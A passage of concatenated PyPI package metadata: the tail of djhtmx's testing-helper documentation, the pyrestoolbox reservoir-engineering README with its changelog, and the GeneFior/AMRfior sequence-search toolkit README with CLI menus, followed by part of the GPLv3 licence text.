`htmx.type(selector: str | html.HtmlElement, text: str, clear=False)`: This simulates typing in an input or text area. If `clear=True` it clears it replaces the current text in it.
`htmx.trigger(selector: str | html.HtmlElement)`: This triggers whatever event is bound in the selected element and returns after all side effects had been processed.
```python
self.htmx.type("input.new-todo", "3rd task")
self.htmx.trigger("input.new-todo")
```
`htmx.send(method: Callable[P, Any], *args: P.args, **kwargs: P.kwargs)`: This sends the runtime to execute that a bound method of a HtmxComponent and returns after all side effects had been processed. Use as in:
```python
todo_list = htmx.get_component_by_type(TodoList)
htmx.send(todo_list.new_item, text="New todo item")
```
`htmx.dispatch_event(self, component_id: str, event_handler: str, kwargs: dict[str, Any])`: Similar to `htmx.send`, but you don't need the instance, you just need to know its id.
```python
htmx.dispatch_event("#todo-list", "new_item", {"text": "New todo item"})
```
| text/markdown | null | Eddy Ernesto del Valle Pino <eddy@edelvalle.me> | null | null | null | django, htmx, liveview, reactive, real-time, spa, websockets | [
"Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"Framework :: Django",
"Framework :: Django :: 4.1",
"Framework :: Django :: 4.2",
"Framework :: Django :: 5.0",
"Framework :: Django :: 5.1",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.13",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
"Topic :: Software Development :: Libraries :: Application Frameworks",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | >=3.13 | [] | [] | [] | [
"channels>=4.1.0",
"django>=4.1",
"mmh3>=5.1.0",
"orjson>=3.10.7",
"pydantic<3,>=2",
"redis[hiredis]>=5.0.8",
"uuid6>=2024.7.10",
"xotl-tools>=3.1.1",
"logfire[django]>=3.8.0; extra == \"logfire\"",
"sentry-sdk>=2.19; extra == \"sentry\""
] | [] | [] | [] | [
"Homepage, https://github.com/edelvalle/djhtmx",
"Documentation, https://github.com/edelvalle/djhtmx#readme",
"Repository, https://github.com/edelvalle/djhtmx.git",
"Issues, https://github.com/edelvalle/djhtmx/issues",
"Changelog, https://github.com/edelvalle/djhtmx/blob/master/CHANGELOG.md"
] | uv/0.10.0 {"installer":{"name":"uv","version":"0.10.0","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Manjaro Linux","version":null,"id":null,"libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null} | 2026-02-20T09:21:49.439538 | djhtmx-1.3.8-py3-none-any.whl | 226,546 | 56/cd/546b22c2c0f786ae0cfbe6b42550ddb3377545f10ee9fc829f044e636ebf/djhtmx-1.3.8-py3-none-any.whl | py3 | bdist_wheel | null | false | 5c4462e29db74d2526e22727717e1a86 | 6cf8471de8f77af02f2dade1983d4adc4830a3d04b73d4bd6db8c7b16c886af4 | 56cd546b22c2c0f786ae0cfbe6b42550ddb3377545f10ee9fc829f044e636ebf | MIT | [
"LICENSE"
] | 228 |
2.4 | pyrestoolbox | 2.2.3 | pyResToolbox - A collection of Reservoir Engineering Utilities | `pyrestoolbox`
==============
\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\--
A collection of Reservoir Engineering Utilities
\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\--
This set of functions focuses on those that the author uses often while
crafting programming solutions. These are the scripts that are often
copy/pasted from previous work - sometimes slightly modified - resulting
in a trail of slightly different versions over the years. Some attempt
has been made here to make this implementation flexible enough such that
it can be relied on as-is going forward.
Note: Version 2.x now refactors functions into different modules, requiring seperate imports
Includes functions to perform simple calculations including;
- Inflow for oil and gas
- PVT Calculations for oil
- PVT calculation for gas
- Return critical parameters for typical components
- Creation of Black Oil Table information
- Creation of layered permeability distribution consistent with a
Lorenz heterogeneity factor
- Extract problem cells information from Intesect (IX) print files
- Generation of AQUTAB include file influence functions for use in
ECLIPSE
- Creation of Corey and LET relative permeability tables in Eclipse
format
- Calculation of Methane and CO2 saturated brine properties
Apologies in advance that it is only in oilfield
units with no current plans to add universal multi-unit support.
Changelist in 2.1.4:
- Fix oil Rs calculation which was inocrrectly always using VALMC method, no matter what the rsmethod was specified in oil_rs_bub
- Updated Gas Z-factor and viscosity with BUR method.
Changelist in 2.1.3:
- Updated viscosity parameters for BUR method.
Changelist in 2.1.2:
- Fixed bug in implementation of Velarde, Blasingame & McCain Oil Rs calculation.
Changelist in 2.1.0:
- Fixed variable Typing issue that caused problems with Python 3.9 and older.
- Added reference to the Burgoyne ('BUR') methods for gas Z-Factor and critical property correlation
Changelist in 2.0.0:
- Modified the new Z-Factor method, 'BUR', now a tuned five component Peng Robinson method that is fast and stable and able to handle up to 100% of CO2, H2S, N2 or H2 as well as natural gas. Viscosities are calculated with a tuned LBC model.
- Refactored all code to split into modules for ease of future maintenance
Changelist in 1.4.4:
- Added in new Z-Factor method, 'BUR', which is a tuned single component Peng Robinson method that is fast and stable
Changelist in 1.4.2:
- Corrected CO2 solubility calculations when two roots in CO2 liquid phase
Changelist in 1.4.1:
- Added calculation of Ezrokhi coefficients for brine density and viscosity with dissolved CO2
Changelist in 1.4.0:
- Introduced CO2 saturated brine calculations using Spycher & Pruess modified SRK EOS method
- Rectified an error introduced in Gas Z-Factor calculations due to errant indentation
Changelist in 1.3.9:
- Tweaks to speed DAK and Hall & Yarborough Z-Factor calculations
Changelist in 1.3.8:
- Fix bug in Hall & Yarborough Z-Factor calculation
Changelist in 1.3.5:
- Fix bug in ECL deck zip/check recursion
Changelist in 1.3.4:
- Extend ECL deck zip/check function to handle IX formatted decks, and support zipping multiple decks at once.
Changelist in 1.3.2:
- Added robust Rachford Rice solver in Simulation Helpers
- Moved relative permeability functions and simulation helpers to seperate .simtools module
Changelist in 1.2.0
- Added Component Critical Property Library
Changelist in v1.1.4:
- Attempting to fix reported issue with required dependencies not installing correctly
Changelist in v1.1:
- Fix API to SG calculation (141.4 vs 141.5)
- Added lower limit to first rho_po estimate for Oil Density with McCain method to avoid negative values with high Rs
- Added oil_sg and oil_api functions
- Modified HY Z-Factor solve algorithm to improve robustness
- Modified DAK Z-Factor solve algorithm to improve robustness
- Added Gas Z-Factor correlation from Wang, Ye & Wu (2021)
- Removed 'LIN' Z-Factor method due to significant errors above 12,000 psi. Use WYW method instead if speed needed.
Head to the project site for more information & documentation;
https://github.com/mwburgoyne/pyResToolbox
Start by importing the package;
from pyrestoolbox import pyrestoolbox as rtb
Function List includes
-------------
- Gas Flow Rate Radial
- Gas Flow Rate Linear
- Oil Flow Rate Radial
- Oil Flow Rate Linear
----------------------------
- Gas Tc & Pc Calculation
- Gas Z-Factor
Calculation
- Gas Viscosity
- Gas Viscosity \* Z
- Gas Compressibility
- Gas Formation Volume Factor
- Gas Density
- Gas Water of Condensation
- Convert P/Z to P
- Convert Gas Gradient to SG
- Delta Pseudopressure
- Gas Condensate FWS SG
----------------------------
- Component Critical Properties Library
----------------------------
- Oil Density from MW
- Oil Critical Properties with Twu
- Incrememtal GOR post Separation
- Oil Bubble Point Pressure
- Oil GOR at Pb
- Oil GOR at P
- Oil Compressibility
- Oil Density
- Oil Formation Volume Factor
- Oil Viscosity
- Generate Black Oil Table data
- Estimate soln gas SG from oil
- Estimate SG of gas post separator
- Calculate weighted average surface gas SG
- Oil API to SG
- Oil SG to API
----------------------------
- Calculate suite of methane saturated brine properties
- Calculate suite of CO2 saturated brine properties
----------------------------
- Lorenz coefficient from Beta value
- Lorenz coefficient from flow fraction
- Lorenz coefficient to flow fraction
- Lorenz coefficient to permeability array
----------------------------
- Summarize IX convergence errors from PRT file
- Create Aquifer Influence Functions
- Solve Rachford Rice for user specified feed Zis and Ki's
- Create sets of rel perm tables
| text/markdown | Mark W. Burgoyne | mark.w.burgoyne@gmail.com | null | null | GNU General Public License v3 or later (GPLv3+) | restoolbox, petroleum, reservoir | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)",
"Operating System :: OS Independent"
] | [] | https://github.com/mwburgoyne/pyResToolbox | null | null | [] | [] | [] | [
"numpy",
"scipy",
"pandas",
"tabulate",
"gwr_inversion",
"mpmath",
"openpyxl"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.9.13 | 2026-02-20T09:21:45.200703 | pyrestoolbox-2.2.3.tar.gz | 1,159,784 | ba/85/417dcfe6064ccee15dc448eb49ab11226679eda151f52ef00a640b8ca66a/pyrestoolbox-2.2.3.tar.gz | source | sdist | null | false | 99c0f06a6b3e0bb36a34c62a2d924d2a | 805e353320d8077a76c240d33157814eb22f7410869596a1be915d45e7fb0576 | ba85417dcfe6064ccee15dc448eb49ab11226679eda151f52ef00a640b8ca66a | null | [
"LICENSE"
] | 258 |
2.4 | GeneFior | 0.6.0 | GeneFior: A toolkit that uses BLAST, BWA, Bowtie2, DIAMOND, MMseqs2 and Minimap2 to search DNA and protein sequences against DNA and AA sequence databases. | # GeneFíor (pronounced Gene "feer", sounds like beer)
This toolkit utilises a combined approach that uses BLAST, BWA, Bowtie2, DIAMOND, MMseqs2 and Minimap2 to search DNA and protein sequences against DNA and AA sequence databases - Databases including CARD/RGI and ResFinder are preloaded.
## Requirements:
- python >=3.10
- samtools >=1.19.2
- blast >=2.17.0
- diamond >=2.1.13
- bowtie2 >=2.5.4
- bwa >=0.7.19
- minimap2 >=2.30
- seqtk >=1.4
- mmseqs2 (mmseqs) >= 18.8cc5c
### Installation:
GeneFíor is available via bioconda. To install, use the following command:
```commandline
conda create -n genefior -c conda-forge -c bioconda genefior
```
GeneFíor is also available via pip, but bioconda is recommended to ensure all dependencies are correctly installed.
```commandline
pip install genefior
```
## Menu for GeneFíor (GeneFíor or GeneFíor):
BLASTn and BLASTx are disabled by default due to their slow speed, but can be enabled if desired.
```commandline
GeneFíor - The Multi-Tool Gene Detection Toolkit.
Required selection:
-i INPUT, --input INPUT
Input FASTA/FASTAQ file(s) with sequences to analyse - Separate FASTQ R1 and R2 with a comma for Paired-FASTQ or single file path for Single-FASTA - .gz files
accepted
-st {Single-FASTA,Paired-FASTQ}, --sequence-type {Single-FASTA,Paired-FASTQ}
Specify the input Sequence Type: Single-FASTA or Paired-FASTQ (R1+R2) - Will convert Paired-FASTQ to single combined FASTA for BLAST and DIAMOND analyses (SLOW)
-o OUTPUT, --output OUTPUT
Output directory for results
Output selection:
--report-fasta {None,all,detected,detected-all}
Specify whether to output sequences that "mapped" to genes."all" should only be used for deep investigation/debugging."detected" will report the reads that passed
detection thresholds for each detected gene."detected-all" will report all reads for each detected gene. (default: None)
Tool selection:
--tools {blastn,blastx,diamond,bowtie2,bwa,minimap2,mmseqs2,all} [{blastn,blastx,diamond,bowtie2,bwa,minimap2,mmseqs2,all} ...]
Specify which tools to run - "all" will run all tools (default: all except blastx/n and mmseqs2 (sensitivity 7.5 and results do not
seem to be deterministic) as these are very slow!!)
Database selection:
--db-path USER_DB_PATH
Path to the directory containing user-provided databases in correct format (see build_databases.sh) (can supply multiple paths separated by commas)
Query threshold Parameters:
--q-min-cov QUERY_MIN_COVERAGE, --query-min-coverage QUERY_MIN_COVERAGE
Minimum coverage threshold in percent (default: 40.0)
Gene Detection Parameters:
--d-min-cov DETECTION_MIN_COVERAGE, --detection-min-coverage DETECTION_MIN_COVERAGE
Minimum coverage threshold in percent (default: 80.0)
--d-min-id DETECTION_MIN_IDENTITY, --detection-min-identity DETECTION_MIN_IDENTITY
Minimum identity threshold in percent (default: 80.0)
--d-min-base-depth DETECTION_MIN_BASE_DEPTH, --detection-min-base-depth DETECTION_MIN_BASE_DEPTH
Minimum average base depth for detection - calculated against regions of the detected gene with at least one read hit (default: 1.0)
--d-min-reads DETECTION_MIN_NUM_READS, --detection-min-num-reads DETECTION_MIN_NUM_READS
Minimum number of reads required for detection (default: 1)
Mode Selection:
--dna-only Run only DNA-based tools
--protein-only Run only protein-based tools
--sensitivity {default,conservative,sensitive,very-sensitive}
Preset sensitivity levels - default means each tool uses its own default settings and very-sensitive applies DIAMONDs --ultra-sensitive and Bowtie2s --very-
sensitive-local presets
Tool-Specific Parameters:
--minimap2-preset {sr,map-ont,map-pb,map-hifi}
Minimap2 preset: sr=short reads, map-ont=Oxford Nanopore, map-pb=PacBio, map-hifi=PacBio HiFi (default: sr)
Runtime Parameters:
-t THREADS, --threads THREADS
Number of threads to use (default: 4)
-tmp TEMP_DIRECTORY, --temp-directory TEMP_DIRECTORY
Path to temporary to place input FASTA/Q file(s) for faster IO during BLAST - Path will also be used for all temporary files (default: system temp directory)
--no_cleanup
--verbose
Miscellaneous Parameters:
-v, --version Show program version and exit
Examples:
# Basic usage with default tools (runs DNA & protein tools)
genefior -i reads.fasta -st Single-FASTA --db-path ~/my-db-dir -o results/
# Select specific tools and output detected FASTA sequences
genefior -i reads.fasta -st Single-FASTA --db-path ~/my-db-dir -o results/ --tools diamond bowtie2 --report_fasta detected
# Custom thresholds, paired-fastq input, threads and dna-only mode
genefior -i reads_R1.fastq,reads_R2.fastq -st Paired-FASTQ --db-path ~/my-db-dir -o results/ -t 16 --d-min-cov 90 --d-min-id 85 --dna-only
```
# AMRFíor has been absorbed into GeneFíor but is still available as a separate command for backwards compatibility with the same functionality and AMR databases.
## Menu for AMRfíor:
CARD and resfinder databases are used by default, but user-provided databases can also be specified.
The NCBI AMR database is also available as an option.
All 3 databases are prepackaged and formatted as part of the bioconda installation of AMRfíor.
## Menu for AMRfíor (AMRfíor or AMRfíor):
BLASTn and BLASTx are disabled by default due to their slow speed, but can be enabled if desired.
```commandline
AMRfíor - The Multi-Tool AMR Gene Detection Toolkit.
Required selection:
-i INPUT, --input INPUT
Input FASTA/FASTAQ file(s) with sequences to analyse - Separate FASTQ R1 and R2 with a comma for Paired-FASTQ or single file path for Single-FASTA - .gz files
accepted
-st {Single-FASTA,Paired-FASTQ}, --sequence-type {Single-FASTA,Paired-FASTQ}
Specify the input Sequence Type: Single-FASTA or Paired-FASTQ (R1+R2) - Will convert Paired-FASTQ to single combined FASTA for BLAST and DIAMOND analyses (SLOW)
-o OUTPUT, --output OUTPUT
Output directory for results
Output selection:
--report-fasta {None,all,detected,detected-all}
Specify whether to output sequences that "mapped" to genes."all" should only be used for deep investigation/debugging."detected" will report the reads that passed
detection thresholds for each detected gene."detected-all" will report all reads for each detected gene. (default: None)
Tool selection:
--tools {blastn,blastx,diamond,bowtie2,bwa,minimap2,mmseqs2,all} [{blastn,blastx,diamond,bowtie2,bwa,minimap2,mmseqs2,all} ...]
Specify which tools to run - "all" will run all tools (default: all except blastx/n and mmseqs2 (sensitivity 7.5 and results do not
seem to be deterministic) as these are very slow!!)
Database selection:
--databases {resfinder,card,ncbi,user-provided} [{resfinder,card,ncbi,user-provided} ...]
Specify which AMR gene databases to use (default: resfinder and card) -If "user-provided" is selected, please ensure the path contains the appropriate databases
set up as per the documentation and specify the path with --user-db-path.
--user-db-path USER_DB_PATH
Path to the directory containing user-provided databases (required if --databases includes "user-provided")
Query threshold Parameters:
--q-min-cov QUERY_MIN_COVERAGE, --query-min-coverage QUERY_MIN_COVERAGE
Minimum coverage threshold in percent (default: 40.0)
Gene Detection Parameters:
--d-min-cov DETECTION_MIN_COVERAGE, --detection-min-coverage DETECTION_MIN_COVERAGE
Minimum coverage threshold in percent (default: 80.0)
--d-min-id DETECTION_MIN_IDENTITY, --detection-min-identity DETECTION_MIN_IDENTITY
Minimum identity threshold in percent (default: 80.0)
--d-min-base-depth DETECTION_MIN_BASE_DEPTH, --detection-min-base-depth DETECTION_MIN_BASE_DEPTH
Minimum average base depth for detection - calculated against regions of the detected gene with at least one read hit (default: 1.0)
--d-min-reads DETECTION_MIN_NUM_READS, --detection-min-num-reads DETECTION_MIN_NUM_READS
Minimum number of reads required for detection (default: 1)
Mode Selection:
--dna-only Run only DNA-based tools
--protein-only Run only protein-based tools
--sensitivity {default,conservative,sensitive,very-sensitive}
Preset sensitivity levels - default means each tool uses its own default settings and very-sensitive applies DIAMONDs --ultra-sensitive and Bowtie2s --very-
sensitive-local presets
Tool-Specific Parameters:
--minimap2-preset {sr,map-ont,map-pb,map-hifi}
Minimap2 preset: sr=short reads, map-ont=Oxford Nanopore, map-pb=PacBio, map-hifi=PacBio HiFi (default: sr)
Runtime Parameters:
-t THREADS, --threads THREADS
Number of threads to use (default: 4)
-tmp TEMP_DIRECTORY, --temp-directory TEMP_DIRECTORY
Path to temporary to place input FASTA/Q file(s) for faster IO during BLAST - Path will also be used for all temporary files (default: system temp directory)
--no_cleanup
--verbose
Miscellaneous Parameters:
-v, --version Show program version and exit
Examples:
# Basic usage with default tools (runs DNA & protein tools)
AMRfior -i reads.fasta -st Single-FASTA -o results/
# Select specific tools and output detected FASTA sequences
AMRfior -i reads.fasta -st Single-FASTA -o results/ --tools diamond bowtie2 --report_fasta detected
# Custom thresholds, paired-fastq input, threads and dna-only mode
AMRfior -i reads_R1.fastq,reads_R2.fastq -st Paired-FASTQ -o results/ -t 16 --d-min-cov 90 --d-min-id 85 --dna-only
```
## Menu for Genefíor-Recompute (Genefíor-Recompute or genefíor-recompute):
### Genefíor-Recompute is used to recalculate detection statistics from existing sequence search outputs with different thresholds without needing to rerun the entire analysis.
```commandline
GeneFíor-Recompute: Recalculate detection statistics from existing sequence search outputs
options:
-h, --help show this help message and exit
-i INPUT, --input INPUT
Input directory containing Genefíor results (with
raw_outputs/ subdirectory)
-o OUTPUT, --output OUTPUT
Output directory for recomputed results
--tools {blastn,blastx,diamond,bowtie2,bwa,minimap2,all} [{blastn,blastx,diamond,bowtie2,bwa,minimap2,all} ...]
Specify which tools to recompute - "all" will
recompute for all detected tools (default: all)
Query threshold Parameters:
--q-min-cov QUERY_MIN_COVERAGE, --query-min-coverage QUERY_MIN_COVERAGE
Minimum coverage threshold in percent (default: 40.0)
Gene Detection Parameters:
--d-min-cov DETECTION_MIN_COVERAGE, --detection-min-coverage DETECTION_MIN_COVERAGE
Minimum coverage threshold in percent (default: 80.0)
--d-min-id DETECTION_MIN_IDENTITY, --detection-min-identity DETECTION_MIN_IDENTITY
Minimum identity threshold in percent (default: 80.0)
--d-min-base-depth DETECTION_MIN_BASE_DEPTH, --detection-min-base-depth DETECTION_MIN_BASE_DEPTH
Minimum average base depth for detection - calculated
against regions of the detected gene with at least one
read hit (default: 1.0)
--d-min-reads DETECTION_MIN_NUM_READS, --detection-min-num-reads DETECTION_MIN_NUM_READS
Minimum number of reads required for detection
(default: 1)
Output Parameterts:
--report-fasta {None,all,detected,detected-all}
Specify whether to output sequences that "mapped" to
genes."all" should only be used for deep
investigation/debugging."detected" will report the
reads that passed detection thresholds for each
detected gene."detected-all" will report all reads for
each detected gene. (default: None)
--query-fasta QUERY_FASTA
Specify the original query FASTA/FASTQ file used for
alignment (required for reporting mapped sequences for
BLAST/DIAMOND).
Miscellaneous Parameters:
-v, --version Show program version and exit
Examples:
# Recompute with different thresholds
Genefior-recompute -i original_results/ -o recomputed_90_90/ \
--d-min-cov 90 --d-min-id 90
# More stringent depth requirement
Genefior-recompute -i original_results/ -o high_depth/ \
--d-min-base-depth 5.0 --d-min-reads 10
```
## Menu for Genefíor-Gene-Stats (Genefíor-Gene-Stats or genefíor-gene-stats):
### Genefíor-Gene-Stats is used to generate summary statistics and visualizations from Genefíor results.
```commandline
Genefíor-Gene-Stats: Generate detailed coverage visualisations for Gene genes
options:
-h, --help show this help message and exit
-i INPUT, --input INPUT
Input directory containing Genefíor results
-o OUTPUT, --output OUTPUT
Output directory for visualisation reports
-g GENES, --genes GENES
Comma-separated gene names (FULL NAMES) or path to file with gene names (one per line)
--databases {resfinder,card,ncbi} [{resfinder,card,ncbi} ...]
Database(s) to interrogate
--tools {blastn,blastx,diamond,bowtie2,bwa,minimap2,all} [{blastn,blastx,diamond,bowtie2,bwa,minimap2,all} ...]
Tool(s) to interrogate
--ref-fasta REF_FASTA
NOT IMPLEMENTED YET - Reference FASTA file for variant calling (optional)
--query-fasta QUERY_FASTA
NOT IMPLEMENTED YET - Query FASTA file (your input reads) for BLAST base-level analysis (optional)
Examples:
# Visualise specific genes (FULL NAMES) from all tools
Genefior-gene-stats -i results/ -o vis/ \
-g "sul1_2_U12338,tet(W)|ARO:3000194" \
--databases resfinder card \
--tools diamond bowtie2 bwa
# Visualise from gene (FULL NAMES) list file with reference
Genefior-gene-stats -i results/ -o vis/ \
-g genes_of_interest.txt \
--databases resfinder \
--tools blastn diamond
```
## Database Setup: See /src/Genefior/databases/ for details on setting up user-provided databases.
### Genefíor includes an automated script in the Databases directory to automate the setup of user-provided databases.
### MMseqs2 database layout
Genefíor now supports MMseqs2 databases in the same explicit layout used for BLAST (separate dirs for AA and DNA).
- The expected directory names for user-provided mmseqs databases are:
- `mmseqs_aa/` (contains amino-acid/protein mmseqs DBs)
- `mmseqs_dna/` (contains nucleotide mmseqs DBs)
This mirrors the `blast_aa/` and `blast_dna/` layout and allows the pipeline to select the correct DB for
protein (aa→aa or translated nt→aa) and nucleotide (nt→nt) searches.
Building mmseqs DBs with the bundled script
- The provided script `src/GeneFior/databases/build_database.sh` will create both MMseqs DB types when given
a nucleotide and a protein FASTA.
Example (build a user database named `mydb` from `genes_nt.fasta` and `genes_aa.fasta`):
```bash
./src/GeneFior/databases/build_database.sh mydb genes_nt.fasta genes_aa.fasta 8
```
After running the script the structure will include:
```
mydb/
blast_aa/ # BLAST protein DB
blast_dna/ # BLAST nucleotide DB
mmseqs_aa/ # MMseqs protein DB(s)
mmseqs_dna/ # MMseqs nucleotide DB(s)
diamond/
bowtie2/
bwa/
minimap2/
```
Notes:
- The `<database>` token in filenames is the database identifier used by Genefíor (for user-provided DBs this is `user-provided-db` by default in the CLI output). If you change the DB name or add multiple user DBs, the filenames will use the corresponding database key.
| text/markdown | null | Nicholas Dimonaco <nicholas@dimonaco.co.uk> | null | null | GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU General Public License is a free, copyleft license for
software and other kinds of works.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.
Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.
For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.
Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.
Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. To prevent this, the GPL assures that
patents cannot be used to render the program non-free.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
